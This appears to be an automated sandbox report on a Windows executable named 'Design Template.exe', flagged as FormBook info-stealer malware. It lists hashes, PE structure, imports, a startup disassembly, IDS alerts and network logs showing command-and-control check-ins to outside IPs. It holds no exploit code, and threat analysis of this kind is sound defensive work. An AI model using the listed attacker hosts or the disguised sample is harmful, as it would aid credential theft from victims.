Preview: MZER.....X......<......(..............................................!..L.!This program cannot be run in DOS mode....$.......}f?.9.QH9.QH9.QH"..Hu.QH"..H:.QH"..H8.QHRich9.QH........PE..L....."<.................r........................@.......................................@..........................................................................................................................................................text...Pp.......r.................. ..`................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.277372055729393
TrID:
• Win32 Executable (generic) a (10002005/4) 99.83%
• Windows Screen Saver (13104/52) 0.13%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Design Template.exe
File size: 479232
MD5: 56d56566623a2bc942141b56f9dd3da5
SHA1: bc76bd9c064a7df36b84d5e08f266c8d4d9819ee
SHA256: 5397f0168be76c7e5efee936d341eb359b9015af5e77631129dc0664105e9259
SHA512: 85f335645b6e92ce0a4cf6c799e03a79f3ca60d19e3cca0dfcb808b08ec7b3e0c0c4f1538097f5ffea270053fb4bc38505d8c127dff3edde05c5181b33691dbf
SSDEEP: 12288:2Onh/74J2eipNdrLCjD6HBTLaQqP+BfWbMto:2Os2eipNdrLCjDzQfWE
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>M.._#.._#.._#.._#.._#./@).._#.DC-.._#.._".K^#..@0.._#./@(.._#..Y%.._#.Rich._#.........................PE..L.....FX...........

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x422c4f
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp: 0x5846A1E0 [Tue Dec 6 11:32:48 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 896af7d86e4ad5191fa88fd4589e505c

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00441190h
push 00424AD4h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 58h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [004331B8h]
xor edx, edx
mov dl, ah
mov dword ptr [0044DF54h], edx
mov ecx, eax
and ecx, 000000FFh
mov dword ptr [0044DF50h], ecx
shl ecx, 08h
add ecx, edx
mov dword ptr [0044DF4Ch], ecx
shr eax, 10h
mov dword ptr [0044DF48h], eax
push 00000001h
call 00007F2138E4EA95h
pop ecx
test eax, eax
jne 00007F2138E4CCBAh
push 0000001Ch
call 00007F2138E4CD78h
pop ecx
call 00007F2138E4E002h
test eax, eax
jne 00007F2138E4CCBAh
push 00000010h
call 00007F2138E4CD67h
pop ecx
xor esi, esi
mov dword ptr [ebp-04h], esi
call 00007F2138E4E8B1h
call dword ptr [004330A8h]
mov dword ptr [0044E65Ch], eax
call 00007F2138E4E76Fh
mov dword ptr [0044DF38h], eax
call 00007F2138E4E518h
call 00007F2138E4E45Ah
call 00007F2138E4D057h
mov dword ptr [ebp-30h], esi
lea eax, dword ptr [ebp-5Ch]
push eax
call dword ptr [004330A4h]
call 00007F2138E4E3EBh
mov dword ptr [ebp-64h], eax
test byte ptr [ebp-30h], 00000001h
je 00007F2138E4CCB8h
movzx eax, word ptr [ebp+00h]

Rich Headers

Programming Language:
• [ C ] VS98 (6.0) build 8168
• [RES] VS98 (6.0) cvtres build 1720
• [C++] VS98 (6.0) build 8168

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x42f48          0xb4          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x5104d          0x1c          .cdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x33000          0x41c         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x32000       0x32000   False     0.535717773438   data       6.07259634526  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x33000          0x12000       0x12000   False     0.622328016493   data       6.95346677981  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x45000          0xa188        0x7000    False     0.887590680804   data       7.61616666061  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.cdata  0x50000          0x28429       0x29000   False     0.933629477896   data       7.95563959987  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLL: Imports
OPENGL32.dll: glCopyPixels, glFlush, glDisableClientState, glCullFace, glClear
KERNEL32.dll: RtlUnwind, GetStartupInfoA, GetCommandLineA, ExitProcess, RaiseException, HeapAlloc, HeapFree, TerminateProcess, HeapReAlloc, HeapSize, GetACP, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStrings, SetHandleCount, GetStdHandle, GetFileType, HeapDestroy, HeapCreate, VirtualFree, SetUnhandledExceptionFilter, VirtualAlloc, IsBadWritePtr, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, IsBadReadPtr, IsBadCodePtr, GetProfileStringA, WriteFile, GetCurrentProcess, SetErrorMode, WritePrivateProfileStringA, GetOEMCP, GetCPInfo, GetProcessVersion, TlsGetValue, LocalReAlloc, TlsSetValue, EnterCriticalSection, GlobalReAlloc, LeaveCriticalSection, TlsFree, GlobalHandle, DeleteCriticalSection, TlsAlloc, InitializeCriticalSection, LocalFree, LocalAlloc, SizeofResource, MultiByteToWideChar, WideCharToMultiByte, InterlockedIncrement, GetLastError, GlobalFlags, lstrcpynA, MulDiv, SetLastError, InterlockedDecrement, CloseHandle, GetModuleFileNameA, VirtualProtect, GlobalAlloc, GetCurrentThread, lstrlenA, lstrcmpA, LoadLibraryA, FreeLibrary, GetVersion, lstrcatA, GetCurrentThreadId, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, lstrcpyA, GetModuleHandleA, GetProcAddress, GlobalLock, GlobalUnlock, GlobalFree, LockResource, FindResourceA, LoadResource, lstrcmpiA, GetEnvironmentStringsW
USER32.dll: PeekMessageA, GetSysColor, SendDlgItemMessageA, UpdateWindow, PostMessageA, IsDlgButtonChecked, IsDialogMessageA, SetWindowTextA, ShowWindow, EnableMenuItem, CheckMenuItem, SetMenuItemBitmaps, ModifyMenuA, GetMenuState, LoadBitmapA, GetMenuCheckMarkDimensions, PostQuitMessage, SetCursor, ValidateRect, TranslateMessage, GetMessageA, ClientToScreen, GetWindowDC, BeginPaint, EndPaint, TabbedTextOutA, DrawTextA, LoadCursorA, GetSysColorBrush, DestroyMenu, LoadStringA, IsWindowVisible, GetTopWindow, MessageBoxA, GetCapture, DispatchMessageA, wsprintfA, GetClassInfoA, RegisterClassA, GetMenuItemCount, GetSubMenu, GetMenuItemID, GetWindowTextLengthA, GetWindowTextA, GetDlgCtrlID, GetKeyState, DefWindowProcA, CreateWindowExA, SetWindowsHookExA, CallNextHookEx, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, GetLastActivePopup, GetForegroundWindow, SetForegroundWindow, RegisterWindowMessageA, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetNextDlgTabItem, EndDialog, GetActiveWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindowEnabled, GetParent, GetWindow, GetClassNameA, MoveWindow, IsIconic, DrawIcon, LoadIconA, SendMessageA, GrayStringA, GetSystemMetrics, ScreenToClient, PtInRect, GetDC, DrawFrameControl, ReleaseDC, InvalidateRect, GetCursorPos, EqualRect, SetCapture, ReleaseCapture, GetMenu, AdjustWindowRect, EnableWindow, GetWindowRect, GetWindowLongA, SetPropA, UnregisterClassA, HideCaret, ShowCaret, SetWindowPos, GetPropA, CallWindowProcA, BeginDeferWindowPos, MapWindowPoints, DeferWindowPos, EndDeferWindowPos, IsWindow, GetDlgItem, GetFocus, SetFocus, AdjustWindowRectEx, WinHelpA, CopyRect, SetWindowLongA, RemovePropA, GetClientRect, IsWindowUnicode, CharNextA, InflateRect, DefDlgProcA, DrawFocusRect, ExcludeUpdateRgn, GetClassLongA
GDI32.dll: GetStockObject, SetBkMode, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, IntersectClipRect, SelectObject, DeleteObject, GetDeviceCaps, CreateSolidBrush, PtVisible, RectVisible, TextOutA, ExtTextOutA, Escape, RestoreDC, SaveDC, DeleteDC, CreateBitmap, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateDIBitmap, PatBlt, GetTextExtentPointA, BitBlt, CreateCompatibleDC
comdlg32.dll: GetOpenFileNameA
WINSPOOL.DRV: DocumentPropertiesA, ClosePrinter, OpenPrinterA
ADVAPI32.dll: RegSetValueExA, RegCloseKey, RegOpenKeyExA, RegCreateKeyExA
COMCTL32.dll:

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/12/21-14:42:55.970349 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49712 | 34.102.136.180 | 192.168.2.7
04/12/21-14:43:29.099579 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49728 | 34.102.136.180 | 192.168.2.7
04/12/21-14:43:40.083059 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49733 | 34.102.136.180 | 192.168.2.7
04/12/21-14:43:50.506458 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49736 | 34.102.136.180 | 192.168.2.7
04/12/21-14:43:55.885724 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.7 | 204.11.56.48
04/12/21-14:43:55.885724 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.7 | 204.11.56.48
04/12/21-14:43:55.885724 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.7 | 204.11.56.48

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 12, 2021 14:42:39.167387962 CEST | 49705 | 80 | 192.168.2.7 | 47.105.113.141
Apr 12, 2021 14:42:39.589288950 CEST | 80 | 49705 | 47.105.113.141 | 192.168.2.7
Apr 12, 2021 14:42:39.589587927 CEST | 49705 | 80 | 192.168.2.7 | 47.105.113.141
Apr 12, 2021 14:42:39.589682102 CEST | 49705 | 80 | 192.168.2.7 | 47.105.113.141
Apr 12, 2021 14:42:40.012196064 CEST | 80 | 49705 | 47.105.113.141 | 192.168.2.7
Apr 12, 2021 14:42:40.012223959 CEST | 80 | 49705 | 47.105.113.141 | 192.168.2.7
Apr 12, 2021 14:42:40.012417078 CEST | 49705 | 80 | 192.168.2.7 | 47.105.113.141
Apr 12, 2021 14:42:40.055970907 CEST | 49705 | 80 | 192.168.2.7 | 47.105.113.141
Apr 12, 2021 14:42:40.441804886 CEST | 80 | 49705 | 47.105.113.141 | 192.168.2.7
Apr 12, 2021 14:42:55.791845083 CEST | 49712 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:42:55.832835913 CEST | 80 | 49712 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:42:55.832917929 CEST | 49712 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:42:55.833060026 CEST | 49712 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:42:55.873897076 CEST | 80 | 49712 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:42:55.970349073 CEST | 80 | 49712 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:42:55.970376015 CEST | 80 | 49712 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:42:55.970525980 CEST | 49712 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:42:55.972614050 CEST | 49712 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:42:56.013549089 CEST | 80 | 49712 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:43:06.087716103 CEST | 49724 | 80 | 192.168.2.7 | 156.226.160.56
Apr 12, 2021 14:43:06.316555977 CEST | 80 | 49724 | 156.226.160.56 | 192.168.2.7
Apr 12, 2021 14:43:06.316780090 CEST | 49724 | 80 | 192.168.2.7 | 156.226.160.56
Apr 12, 2021 14:43:06.316806078 CEST | 49724 | 80 | 192.168.2.7 | 156.226.160.56
Apr 12, 2021 14:43:06.545553923 CEST | 80 | 49724 | 156.226.160.56 | 192.168.2.7
Apr 12, 2021 14:43:06.805433035 CEST | 49724 | 80 | 192.168.2.7 | 156.226.160.56
Apr 12, 2021 14:43:07.075186014 CEST | 80 | 49724 | 156.226.160.56 | 192.168.2.7
Apr 12, 2021 14:43:09.141789913 CEST | 80 | 49724 | 156.226.160.56 | 192.168.2.7
Apr 12, 2021 14:43:09.141813040 CEST | 80 | 49724 | 156.226.160.56 | 192.168.2.7
Apr 12, 2021 14:43:09.142075062 CEST | 49724 | 80 | 192.168.2.7 | 156.226.160.56
Apr 12, 2021 14:43:09.142097950 CEST | 49724 | 80 | 192.168.2.7 | 156.226.160.56
Apr 12, 2021 14:43:11.909854889 CEST | 49725 | 80 | 192.168.2.7 | 198.50.252.64
Apr 12, 2021 14:43:12.049487114 CEST | 80 | 49725 | 198.50.252.64 | 192.168.2.7
Apr 12, 2021 14:43:12.049683094 CEST | 49725 | 80 | 192.168.2.7 | 198.50.252.64
Apr 12, 2021 14:43:12.049977064 CEST | 49725 | 80 | 192.168.2.7 | 198.50.252.64
Apr 12, 2021 14:43:12.192271948 CEST | 80 | 49725 | 198.50.252.64 | 192.168.2.7
Apr 12, 2021 14:43:12.192353964 CEST | 80 | 49725 | 198.50.252.64 | 192.168.2.7
Apr 12, 2021 14:43:12.192392111 CEST | 80 | 49725 | 198.50.252.64 | 192.168.2.7
Apr 12, 2021 14:43:12.192430019 CEST | 80 | 49725 | 198.50.252.64 | 192.168.2.7
Apr 12, 2021 14:43:12.192467928 CEST | 80 | 49725 | 198.50.252.64 | 192.168.2.7
Apr 12, 2021 14:43:12.192502975 CEST | 80 | 49725 | 198.50.252.64 | 192.168.2.7
Apr 12, 2021 14:43:12.192529917 CEST | 80 | 49725 | 198.50.252.64 | 192.168.2.7
Apr 12, 2021 14:43:12.192528963 CEST | 49725 | 80 | 192.168.2.7 | 198.50.252.64
Apr 12, 2021 14:43:12.192778111 CEST | 49725 | 80 | 192.168.2.7 | 198.50.252.64
Apr 12, 2021 14:43:12.192960978 CEST | 49725 | 80 | 192.168.2.7 | 198.50.252.64
Apr 12, 2021 14:43:12.332376957 CEST | 80 | 49725 | 198.50.252.64 | 192.168.2.7
Apr 12, 2021 14:43:17.302906036 CEST | 49726 | 80 | 192.168.2.7 | 160.153.136.3
Apr 12, 2021 14:43:17.353419065 CEST | 80 | 49726 | 160.153.136.3 | 192.168.2.7
Apr 12, 2021 14:43:17.353622913 CEST | 49726 | 80 | 192.168.2.7 | 160.153.136.3
Apr 12, 2021 14:43:17.353806019 CEST | 49726 | 80 | 192.168.2.7 | 160.153.136.3
Apr 12, 2021 14:43:17.404323101 CEST | 80 | 49726 | 160.153.136.3 | 192.168.2.7
Apr 12, 2021 14:43:17.404589891 CEST | 49726 | 80 | 192.168.2.7 | 160.153.136.3
Apr 12, 2021 14:43:17.404681921 CEST | 49726 | 80 | 192.168.2.7 | 160.153.136.3
Apr 12, 2021 14:43:17.458651066 CEST | 80 | 49726 | 160.153.136.3 | 192.168.2.7
Apr 12, 2021 14:43:23.329819918 CEST | 49727 | 80 | 192.168.2.7 | 14.215.190.65
Apr 12, 2021 14:43:23.580332994 CEST | 80 | 49727 | 14.215.190.65 | 192.168.2.7
Apr 12, 2021 14:43:23.581245899 CEST | 49727 | 80 | 192.168.2.7 | 14.215.190.65
Apr 12, 2021 14:43:23.581275940 CEST | 49727 | 80 | 192.168.2.7 | 14.215.190.65
Apr 12, 2021 14:43:23.827841043 CEST | 80 | 49727 | 14.215.190.65 | 192.168.2.7
Apr 12, 2021 14:43:23.831491947 CEST | 80 | 49727 | 14.215.190.65 | 192.168.2.7
Apr 12, 2021 14:43:23.831516027 CEST | 80 | 49727 | 14.215.190.65 | 192.168.2.7
Apr 12, 2021 14:43:23.831702948 CEST | 49727 | 80 | 192.168.2.7 | 14.215.190.65
Apr 12, 2021 14:43:23.831736088 CEST | 49727 | 80 | 192.168.2.7 | 14.215.190.65
Apr 12, 2021 14:43:24.032521963 CEST | 80 | 49727 | 14.215.190.65 | 192.168.2.7
Apr 12, 2021 14:43:24.032763958 CEST | 49727 | 80 | 192.168.2.7 | 14.215.190.65
Apr 12, 2021 14:43:24.074176073 CEST | 80 | 49727 | 14.215.190.65 | 192.168.2.7
Apr 12, 2021 14:43:28.920898914 CEST | 49728 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:43:28.962025881 CEST | 80 | 49728 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:43:28.962302923 CEST | 49728 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:43:28.962619066 CEST | 49728 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:43:29.003592014 CEST | 80 | 49728 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:43:29.099579096 CEST | 80 | 49728 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:43:29.099618912 CEST | 80 | 49728 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:43:29.099925995 CEST | 49728 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:43:29.100064039 CEST | 49728 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:43:29.140958071 CEST | 80 | 49728 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:43:39.904767036 CEST | 49733 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:43:39.945777893 CEST | 80 | 49733 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:43:39.945981026 CEST | 49733 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:43:39.946073055 CEST | 49733 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:43:39.986855030 CEST | 80 | 49733 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:43:40.083059072 CEST | 80 | 49733 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:43:40.083096981 CEST | 80 | 49733 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:43:40.083825111 CEST | 49733 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:43:40.083853006 CEST | 49733 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:43:40.125268936 CEST | 80 | 49733 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:43:50.326803923 CEST | 49736 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:43:50.369370937 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:43:50.369771957 CEST | 49736 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:43:50.370038033 CEST | 49736 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:43:50.410672903 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:43:50.506458044 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:43:50.506483078 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.7
Apr 12, 2021 14:43:50.507009983 CEST | 49736 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:43:50.507102013 CEST | 49736 | 80 | 192.168.2.7 | 34.102.136.180
Apr 12, 2021 14:43:50.547902107 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.7

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 12, 2021 14:41:19.943381071 CEST | 63354 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:41:20.002774954 CEST | 53 | 63354 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:41:20.252338886 CEST | 53129 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:41:20.301002026 CEST | 53 | 53129 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:41:21.063261032 CEST | 62452 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:41:21.114973068 CEST | 53 | 62452 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:41:28.611020088 CEST | 57820 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:41:28.660525084 CEST | 53 | 57820 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:41:30.808311939 CEST | 50848 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:41:30.856991053 CEST | 53 | 50848 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:41:40.533992052 CEST | 61242 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:41:40.592926025 CEST | 53 | 61242 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:41:52.152436018 CEST | 58562 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:41:52.211227894 CEST | 53 | 58562 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:41:58.336416006 CEST | 56590 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:41:58.388233900 CEST | 53 | 56590 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:41:59.289062023 CEST | 60501 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:41:59.346138000 CEST | 53 | 60501 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:15.167821884 CEST | 53775 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:15.226773024 CEST | 53 | 53775 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:24.988890886 CEST | 51837 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:25.040378094 CEST | 53 | 51837 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:30.155750036 CEST | 55411 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:30.204756021 CEST | 53 | 55411 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:30.601542950 CEST | 63668 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:30.660084963 CEST | 53 | 63668 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:34.022248030 CEST | 54640 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:34.084567070 CEST | 53 | 54640 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:39.103795052 CEST | 58739 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:39.162935972 CEST | 53 | 58739 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:45.073788881 CEST | 60338 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:45.164273024 CEST | 53 | 60338 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:50.307725906 CEST | 58717 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:50.700989962 CEST | 53 | 58717 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:50.747783899 CEST | 59762 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:50.813944101 CEST | 53 | 59762 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:52.261464119 CEST | 54329 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:52.360915899 CEST | 53 | 54329 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:53.079898119 CEST | 58052 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:53.183572054 CEST | 53 | 58052 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:54.075596094 CEST | 54008 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:54.178920984 CEST | 53 | 54008 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:54.820456028 CEST | 59451 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:54.877789021 CEST | 53 | 59451 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:55.714117050 CEST | 64569 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:55.714190006 CEST | 52914 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:55.765783072 CEST | 53 | 64569 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:55.790788889 CEST | 53 | 52914 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:56.540268898 CEST | 52816 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:56.597579002 CEST | 53 | 52816 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:57.228183985 CEST | 50781 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:57.285253048 CEST | 53 | 50781 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:58.271996021 CEST | 54230 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:58.321521997 CEST | 53 | 54230 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:42:59.478202105 CEST | 54911 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:42:59.535201073 CEST | 53 | 54911 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:00.000978947 CEST | 49958 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:00.058001041 CEST | 53 | 49958 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:02.981076956 CEST | 50860 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:03.029719114 CEST | 53 | 50860 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:03.104815006 CEST | 50452 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:03.163594007 CEST | 53 | 50452 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:06.027095079 CEST | 59730 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:06.085716963 CEST | 53 | 59730 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:11.829840899 CEST | 59310 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:11.907810926 CEST | 53 | 59310 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:17.205431938 CEST | 51919 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:17.301090002 CEST | 53 | 51919 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:22.446202040 CEST | 64296 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:23.328795910 CEST | 53 | 64296 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:28.843533993 CEST | 56680 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:28.919328928 CEST | 53 | 56680 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:33.305284977 CEST | 58820 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:33.321546078 CEST | 60983 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:33.354269981 CEST | 53 | 58820 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:33.373353004 CEST | 53 | 60983 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:34.106187105 CEST | 49247 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:34.382898092 CEST | 52286 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:34.440388918 CEST | 53 | 52286 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:34.814937115 CEST | 53 | 49247 | 8.8.8.8 | 192.168.2.7
